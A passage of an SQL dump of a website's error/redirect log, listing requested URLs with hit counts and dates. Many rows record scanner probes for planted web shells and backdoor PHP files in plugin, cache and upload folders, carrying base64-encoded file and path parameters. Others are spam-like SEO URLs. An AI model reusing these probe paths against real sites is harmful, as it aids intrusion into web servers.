00:00:00'),(8133,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:27:30','0000-00-00 00:00:00'),(8134,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:27:44','0000-00-00 00:00:00'),(8135,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:32:31','0000-00-00 00:00:00'),(8136,'http://hallcrestheights.org//cache/list.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:32:33','0000-00-00 00:00:00'),(8137,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/aB5rjK.php',NULL,'','',1,0,'2017-04-07 01:35:07','0000-00-00 00:00:00'),(8138,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/aB5rjK.php',NULL,'','',1,0,'2017-04-07 01:35:10','0000-00-00 00:00:00'),(8139,'http://hallcrestheights.org//wp-content/uploads/aB5rjK.php',NULL,'','',1,0,'2017-04-07 01:35:20','0000-00-00 00:00:00'),(8140,'http://hallcrestheights.org//aB5rjK.php',NULL,'','',1,0,'2017-04-07 01:35:22','0000-00-00 00:00:00'),(8141,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/aB5rjK.php',NULL,'','',1,0,'2017-04-07 01:35:31','0000-00-00 00:00:00'),(8142,'http://www.hallcrestheights.org/wbwpb-k35577-onkydh-xjjik-i20162635-vfvt-zpxbxkc-wjybtylw-osduieqg-wsogxhg/',NULL,'','',3,0,'2017-04-08 03:43:00','0000-00-00 00:00:00'),(8143,'http://www.hallcrestheights.org/k14920-dvisciwb-vwkux-i20162632-krbzomsm-vuclzup-hvqa.htm',NULL,'android-app://com.google.android.googlequicksearchbox','',12,0,'2017-04-08 08:32:39','0000-00-00 00:00:00'),(8144,'http://www.hallcrestheights.org/bsoap-azapst/k54007-asgmh-cqcm-i20162634-ckfrdtf/',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjuzMCpq5bTAhUKWrwKHVJoANkQFggiMAA&url=http%3A%2F%2Fwww.hallcrestheights.or','',5,0,'2017-04-09 02:35:54','0000-00-00 00:00:00'),(8145,'http://www.hallcrestheights.org/pages/school-00.html',NULL,'','',4,0,'2017-04-09 05:02:34','0000-00-00 00:00:00'),(8146,'http://www.hallcrestheights.org/nfrkopd-obbum-golzes-k46273-rkwtzq-tqbsv-i20162630-jcwj-bxnmyv/',NULL,'https://search.yahoo.co.jp/','',7,0,'2017-04-09 14:26:24','0000-00-00 00:00:00'),(8147,'http://hallcrestheights.org/brwrplus/flink.php',NULL,'','',1,0,'2017-04-10 11:00:53','0000-00-00 00:00:00'),(8148,'http://hallcrestheights.org/plus/flink.php',NULL,'','',8,0,'2017-04-10 11:00:59','0000-00-00 00:00:00'),(8149,'http://www.hallcrestheights.org/oiyiz-i20162635-golrcm-wfbsn-opdg-fnhskrl-k14477-jrgfctfz/',NULL,'','',2,0,'2017-04-10 12:54:02','0000-00-00 00:00:00'),(8150,'http://www.hallcrestheights.org/htxwhykr-k32641-svsv-hudykbq-xdosfiet-i20162629-yuaixnrb/',NULL,'','',3,0,'2017-04-10 22:06:43','0000-00-00 00:00:00'),(8151,'http://www.hallcrestheights.org/jgletk-i20162629-ymdrqz-k45356-nrvmlk-swaz-vkecqq-neeiaq.htm',NULL,'','',3,0,'2017-04-11 02:30:30','0000-00-00 00:00:00'),(8152,'http://www.hallcrestheights.org/bsoap-azapst/asgmh-i20162635-k35027-cqcm/',NULL,'','',1,0,'2017-04-11 04:28:29','0000-00-00 00:00:00'),(8153,'http://www.hallcrestheights.org/htxwh-k14077-ykrsvs-vhudy-kbqx-dosfiet-yuaixnrb-dggsaarh-i20162635-efskjyd-mrujwimj/',NULL,'','',3,0,'2017-04-11 08:02:18','0000-00-00 00:00:00'),(8154,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx-dosfiet-k34877-yuaixnrb-dggsaarh-i20162635-efskjyd-mrujwimj-qiaau-rihc-ywncqs/',NULL,'','',3,0,'2017-04-11 08:15:43','0000-00-00 00:00:00'),(8155,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-i20162635-cqcm-ckfrdtf-k14877-kgpvbchs-iwhorklv-zrtjrsy/',NULL,'','',3,0,'2017-04-11 11:41:16','0000-00-00 00:00:00'),(8156,'http://www.hallcrestheights.org/oiyiz-k24877-golrcm-wfbsn-opdg-fnhskrl-jrgfctfz-fiwxwmak-i20162635-oayosmp-qlgvegdf/',NULL,'','',3,0,'2017-04-11 12:09:03','0000-00-00 00:00:00'),(8157,'http://www.hallcrestheights.org/ajqxx-i20162635-ucuzao/fifep-hiij-imjnjbo-k14027-gtsakbcc/',NULL,'','',2,0,'2017-04-11 15:39:21','0000-00-00 00:00:00'),(8158,'http://hallcrestheights.org/plugins/logo_img.php',NULL,'http://hallcrestheights.org/plugins/logo_img.php','',11,0,'2017-04-11 17:21:33','0000-00-00 00:00:00'),(8159,'http://hallcrestheights.org/libraries/cms/language/backup.php',NULL,'http://hallcrestheights.org/libraries/cms/language/backup.php','',1,0,'2017-04-11 17:21:33','0000-00-00 00:00:00'),(8160,'http://hallcrestheights.org/inc.php',NULL,'http://hallcrestheights.org/inc.php','',8,0,'2017-04-11 17:21:33','0000-00-00 00:00:00'),(8161,'http://hallcrestheights.org/images/system_ml.php',NULL,'http://hallcrestheights.org/images/system_ml.php','',2,0,'2017-04-11 17:21:33','0000-00-00 00:00:00'),(8162,'http://hallcrestheights.org/modules/mod_ariimageslidersa/system_ml.php',NULL,'http://hallcrestheights.org/modules/mod_ariimageslidersa/system_ml.php','',2,0,'2017-04-11 17:28:32','0000-00-00 00:00:00'),(8163,'http://hallcrestheights.org/tmp/mfiuha.php',NULL,'http://hallcrestheights.org/tmp/mfiuha.php','',2,0,'2017-04-11 17:32:15','0000-00-00 00:00:00'),(8164,'http://hallcrestheights.org/modules/mod_securnet/mod_securnet.php',NULL,'http://hallcrestheights.org/modules/mod_securnet/mod_securnet.php','',2,0,'2017-04-11 17:32:16','0000-00-00 00:00:00'),(8165,'http://hallcrestheights.org/lndex.php',NULL,'http://hallcrestheights.org/lndex.php','',8,0,'2017-04-11 17:32:16','0000-00-00 00:00:00'),(8166,'http://www.hallcrestheights.org/i20162635-tkuyk-fjdnjj-k35377-bucyu-paja-ylrlwfv/',NULL,'','',2,0,'2017-04-12 02:35:43','0000-00-00 00:00:00'),(8167,'http://hallcrestheights.org/wjluplus/flink.php',NULL,'','',1,0,'2017-04-12 03:22:40','0000-00-00 00:00:00'),(8168,'http://hallcrestheights.org/index.php?option=com_user&view=register',NULL,'http://HALLCRESTHEIGHTS.ORG/index.php?option=com_user&view=register','',1,0,'2017-04-12 17:40:48','0000-00-00 00:00:00'),(8169,'http://www.hallcrestheights.org/k10016-mrcqgb-eifuwg-rabtnw-i20162635-yrqs.htm',NULL,'https://search.yahoo.co.jp/','',6,0,'2017-04-13 11:43:04','0000-00-00 00:00:00'),(8170,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-oqkgqa-i20162636-k11533-qydcp-tznz-vtjqoe/',NULL,'','',2,0,'2017-04-13 21:16:45','0000-00-00 00:00:00'),(8171,'http://www.hallcrestheights.org/k14480-ixnmueah-whioz-hjxbnwpg-i20162631-eyooayi.htm',NULL,'','',3,0,'2017-04-14 00:26:03','0000-00-00 00:00:00'),(8172,'http://www.hallcrestheights.org/kzpff-i20162635-msxklr-dedhw-gefv-bbgzagp-k35177-eciyyuwu/',NULL,'','',3,0,'2017-04-14 02:17:18','0000-00-00 00:00:00'),(8173,'http://www.hallcrestheights.org/i20162636-k42704-jglet-kymd-rqzn-rvmlkswa.htm',NULL,'https://www.google.co.jp/','',2,0,'2017-04-14 06:08:29','0000-00-00 00:00:00'),(8174,'http://www.hallcrestheights.org/xhajv-k13977-qlwczb-iqsos-i20162635-qxoq-kgqaqyd-cptznzvt-jqoevpca-qwjaluw/',NULL,'','',2,0,'2017-04-14 20:50:31','0000-00-00 00:00:00'),(8175,'http://www.hallcrestheights.org/i20162628-k7640-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'https://www.google.co.jp/','',5,0,'2017-04-15 05:33:45','0000-00-00 00:00:00'),(8176,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja-ylrlwfv-i20162635-dyruqpkl-sdefhxdf-k14577-pdfufpf-ajnpvzat-tuxdw/',NULL,'','',2,0,'2017-04-15 09:46:00','0000-00-00 00:00:00'),(8177,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k45673-jaylrl-wfvdy/',NULL,'https://www.google.co.jp/','',5,0,'2017-04-15 18:37:02','0000-00-00 00:00:00'),(8178,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik-ghhmb-i20162633-k58865-bxpgesm/',NULL,'','',2,0,'2017-04-16 14:05:49','0000-00-00 00:00:00'),(8179,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh-vfcyzls-xxqroxae-hkskxyxe-mbuqudt-wqceyvuc-i20162635-iwqws-k14277-gfrv/',NULL,'','',3,0,'2017-04-16 20:26:11','0000-00-00 00:00:00'),(8180,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl-nikghhm-k35777-bbxpgesm-rcaiztbi-i20162635-auwdtvi-xpmtzhzz-wzrqr-dcfp-smfwaz/',NULL,'','',2,0,'2017-04-16 21:06:39','0000-00-00 00:00:00'),(8181,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf/i20162635-xrgl-nikghhm-bbxpgesm-rcaiztbi-k35127-auwdtvi/',NULL,'','',2,0,'2017-04-16 23:18:00','0000-00-00 00:00:00'),(8182,'http://www.hallcrestheights.org/soegs-k24677-zxyife-tvtnd-i20162635-yuuh/',NULL,'','',4,0,'2017-04-17 06:35:05','0000-00-00 00:00:00'),(8183,'http://www.hallcrestheights.org/nfrkopd-obbum-i20162636-golzes-rkwtzq-tqbsv-k31973-jcwj/',NULL,'','',2,0,'2017-04-17 11:13:38','0000-00-00 00:00:00'),(8184,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-tnwyrqse-mgwkowh-i20162632-memxgk-ucybn-pzkicvej-xkul-k41528-zjcjkn-tsxj-lnuu-uvtff.htm',NULL,'','',5,0,'2017-04-17 11:29:45','0000-00-00 00:00:00'),(8185,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-i20162637-jaylrl-wfvdy-k48533-ruqp/',NULL,'','',2,0,'2017-04-17 13:12:45','0000-00-00 00:00:00'),(8186,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-i20162632-snop-dgfnh-k60289-skrl/',NULL,'','',3,0,'2017-04-17 14:09:59','0000-00-00 00:00:00'),(8187,'http://www.hallcrestheights.org/edzvd-i20162636-lqco-mnnm-mcawvbfu-k53224-japyvrlf.htm',NULL,'','',2,0,'2017-04-17 18:22:30','0000-00-00 00:00:00'),(8188,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm-i20162636-k37237-ckfrdtf-kgpvbchs-iwhorklv/',NULL,'','',2,0,'2017-04-17 18:23:10','0000-00-00 00:00:00'),(8189,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf/i20162635-k24727-xrgl-nikghhm-bbxpgesm-rcaiztbi/',NULL,'','',2,0,'2017-04-17 21:46:07','0000-00-00 00:00:00'),(8190,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk/wtzqtqb-svjcwjbx-nmyvsssl-i20162635-djznaah-jbkwxros-holvg-wxkw-k35327-oihomw/',NULL,'','',2,0,'2017-04-18 04:34:42','0000-00-00 00:00:00'),(8191,'http://www.hallcrestheights.org/kzpffm-sxklrded-i20162632-hwge-fvbbg-k6109-zagp/',NULL,'','',2,0,'2017-04-18 11:21:05','0000-00-00 00:00:00'),(8192,'http://www.hallcrestheights.org/i20162636-cwhriwg-k32273-pekzq-dwkvum-zbsaii/',NULL,'','',3,0,'2017-04-18 13:52:43','0000-00-00 00:00:00'),(8193,'http://www.hallcrestheights.org/upttmnbe-atgrb-k35780-nqcdcncx-i20162631-rdhcpgz-zdll-imvyx.htm',NULL,'','',3,0,'2017-04-18 21:28:42','0000-00-00 00:00:00'),(8194,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb-saiimjz-fozgdvdd-qjvdobkn-lykcone-k34977-dwjmaxev-i20162635-ortbz-qsax/',NULL,'','',3,0,'2017-04-19 00:04:31','0000-00-00 00:00:00'),(8195,'http://www.hallcrestheights.org/i20162628-nfrkopdo-bbum-golzesr-kwtzqtqb-svjcwjbx-k6701-nmyv/',NULL,'','',2,0,'2017-04-19 07:28:35','0000-00-00 00:00:00'),(8196,'http://www.hallcrestheights.org/lugd-i20162631-ltrsmxx-k59092-hypzq-jllzoh-njumnte.htm',NULL,'','',3,0,'2017-04-19 08:37:21','0000-00-00 00:00:00'),(8197,'http://www.hallcrestheights.org/i20162635-cwhriwgp-k18961-ekzq-dwkvumz-bsaiimjz-fozgdvdd/',NULL,'','',2,0,'2017-04-19 09:55:57','0000-00-00 00:00:00'),(8198,'http://www.hallcrestheights.org/htxwh-ykrsvs-k35527-vhudy/i20162635-kbqx-dosfiet-yuaixnrb-dggsaarh/',NULL,'','',2,0,'2017-04-19 17:51:20','0000-00-00 00:00:00'),(8199,'http://www.hallcrestheights.org/i20162636-k31724-upttm-nbea-tgrb-nqcdcncx.htm',NULL,'','',2,0,'2017-04-19 19:43:56','0000-00-00 00:00:00'),(8200,'http://hallcrestheights.org/xsoiplus/flink.php',NULL,'','',1,0,'2017-04-19 22:14:07','0000-00-00 00:00:00'),(8201,'http://www.hallcrestheights.org/k49920-fadlajfn-i20162631-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',16,0,'2017-04-19 22:14:26','0000-00-00 00:00:00'),(8202,'http://www.hallcrestheights.org/vqjny-spvh-i20162632-oljp-eurrtpil-k42784-uourxivl.htm',NULL,'','',4,0,'2017-04-20 05:23:33','0000-00-00 00:00:00'),(8203,'http://www.hallcrestheights.org/xhajvqlw-k48401-czbi-i20162630-qsosqxo-qkgqaqyd/',NULL,'https://www.google.co.jp/','',5,0,'2017-04-20 23:26:06','0000-00-00 00:00:00'),(8204,'http://www.hallcrestheights.org/i20162632-upttmnb-eatgrbnq-cdcncxrd-hcpgzzd-k42228-llimvy-xjltf-eobkebwi-vsmq.htm',NULL,'https://search.yahoo.co.jp/','',3,0,'2017-04-21 00:06:56','0000-00-00 00:00:00'),(8205,'http://hallcrestheights.org//images/1ndex.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-22 07:45:55','0000-00-00 00:00:00'),(8206,'http://hallcrestheights.org//sqlbak.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:45:57','0000-00-00 00:00:00'),(8207,'http://hallcrestheights.org//email.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:00','0000-00-00 00:00:00'),(8208,'http://hallcrestheights.org//functions.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:03','0000-00-00 00:00:00'),(8209,'http://hallcrestheights.org//cache/news.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:08','0000-00-00 00:00:00'),(8210,'http://hallcrestheights.org//tmp.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-04-22 07:46:11','0000-00-00 00:00:00'),(8211,'http://hallcrestheights.org//shootme.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:13','0000-00-00 00:00:00'),(8212,'http://hallcrestheights.org//configurationbak.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-22 07:46:16','0000-00-00 00:00:00'),(8213,'http://hallcrestheights.org//robots.txt.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:39','0000-00-00 00:00:00'),(8214,'http://hallcrestheights.org//jconfig.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:41','0000-00-00 00:00:00'),(8215,'http://hallcrestheights.org//media/reads.php?z3=R2FYTVRNLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:45','0000-00-00 00:00:00'),(8216,'http://hallcrestheights.org//media/1ndex.php?z3=R2FYTVRNLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:49','0000-00-00 00:00:00'),(8217,'http://hallcrestheights.org//sql_dump.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:51','0000-00-00 00:00:00'),(8218,'http://hallcrestheights.org//images/laj.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:53','0000-00-00 00:00:00'),(8219,'http://hallcrestheights.org//media/404.php?z3=R2FYTVRNLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:46:58','0000-00-00 00:00:00'),(8220,'http://hallcrestheights.org//media/tmp.php?z3=R2FYTVRNLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:01','0000-00-00 00:00:00'),(8221,'http://hallcrestheights.org//r3x.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:04','0000-00-00 00:00:00'),(8222,'http://hallcrestheights.org//log.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:07','0000-00-00 00:00:00'),(8223,'http://hallcrestheights.org//images/stories/0day.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:09','0000-00-00 00:00:00'),(8224,'http://hallcrestheights.org//includes/u2p.php?z3=R2FYTVRNLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:11','0000-00-00 00:00:00'),(8225,'http://hallcrestheights.org//images/xxx.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:14','0000-00-00 00:00:00'),(8226,'http://hallcrestheights.org//al277.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:16','0000-00-00 00:00:00'),(8227,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:19','0000-00-00 00:00:00'),(8228,'http://hallcrestheights.org//install.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:21','0000-00-00 00:00:00'),(8229,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=R2FYTVRNLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:24','0000-00-00 00:00:00'),(8230,'http://hallcrestheights.org//robot.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:26','0000-00-00 00:00:00'),(8231,'http://hallcrestheights.org//wsdl.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:30','0000-00-00 00:00:00'),(8232,'http://hallcrestheights.org//goog1es.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:33','0000-00-00 00:00:00'),(8233,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=R2FYTVRNLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:36','0000-00-00 00:00:00'),(8234,'http://hallcrestheights.org//update.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:38','0000-00-00 00:00:00'),(8235,'http://hallcrestheights.org//includes.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:41','0000-00-00 00:00:00'),(8236,'http://hallcrestheights.org//wp-main.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:43','0000-00-00 00:00:00'),(8237,'http://hallcrestheights.org//news.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:45','0000-00-00 00:00:00'),(8238,'http://hallcrestheights.org//images/al277.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:49','0000-00-00 00:00:00'),(8239,'http://hallcrestheights.org//webconfig.txt.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:47:51','0000-00-00 00:00:00'),(8240,'http://hallcrestheights.org//cache/cachee.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-04-22 07:48:17','0000-00-00 00:00:00'),(8241,'http://hallcrestheights.org//thumb.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:18','0000-00-00 00:00:00'),(8242,'http://hallcrestheights.org//SessionController.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:24','0000-00-00 00:00:00'),(8243,'http://hallcrestheights.org//maill.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:27','0000-00-00 00:00:00'),(8244,'http://hallcrestheights.org//error-log.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:32','0000-00-00 00:00:00'),(8245,'http://hallcrestheights.org//authenticating.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:35','0000-00-00 00:00:00'),(8246,'http://hallcrestheights.org//google-assist.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:37','0000-00-00 00:00:00'),(8247,'http://hallcrestheights.org//images/google-assist.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:39','0000-00-00 00:00:00'),(8248,'http://hallcrestheights.org//images/robots.txt.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:42','0000-00-00 00:00:00'),(8249,'http://hallcrestheights.org//elements.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:44','0000-00-00 00:00:00'),(8250,'http://hallcrestheights.org//xmlsrpc.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:46','0000-00-00 00:00:00'),(8251,'http://hallcrestheights.org//wp-cache.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:49','0000-00-00 00:00:00'),(8252,'http://hallcrestheights.org//images/404.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:51','0000-00-00 00:00:00'),(8253,'http://hallcrestheights.org//images/head.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:54','0000-00-00 00:00:00'),(8254,'http://hallcrestheights.org//cache/support.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:56','0000-00-00 00:00:00'),(8255,'http://hallcrestheights.org//RoseLeif.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:48:58','0000-00-00 00:00:00'),(8256,'http://hallcrestheights.org//Abbrevsprl.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:01','0000-00-00 00:00:00'),(8257,'http://hallcrestheights.org//show.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:04','0000-00-00 00:00:00'),(8258,'http://hallcrestheights.org//images/defau1t.php?z3=R2FYTVRNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:06','0000-00-00 00:00:00'),(8259,'http://hallcrestheights.org//cli/40dd1d.php?z3=R2FYTVRNLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:08','0000-00-00 00:00:00'),(8260,'http://hallcrestheights.org//infos.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:12','0000-00-00 00:00:00'),(8261,'http://hallcrestheights.org//cache/defau1t.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:15','0000-00-00 00:00:00'),(8262,'http://hallcrestheights.org//bookmark.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:17','0000-00-00 00:00:00'),(8263,'http://hallcrestheights.org//configbak.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:20','0000-00-00 00:00:00'),(8264,'http://hallcrestheights.org//wp-data.php?z3=R2FYTVRNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:24','0000-00-00 00:00:00'),(8265,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:26','0000-00-00 00:00:00'),(8266,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:29','0000-00-00 00:00:00'),(8267,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:31','0000-00-00 00:00:00'),(8268,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:34','0000-00-00 00:00:00'),(8269,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:37','0000-00-00 00:00:00'),(8270,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:49:41','0000-00-00 00:00:00'),(8271,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-22 07:50:03','0000-00-00 00:00:00'),(8272,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:50:05','0000-00-00 00:00:00'),(8273,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:50:07','0000-00-00 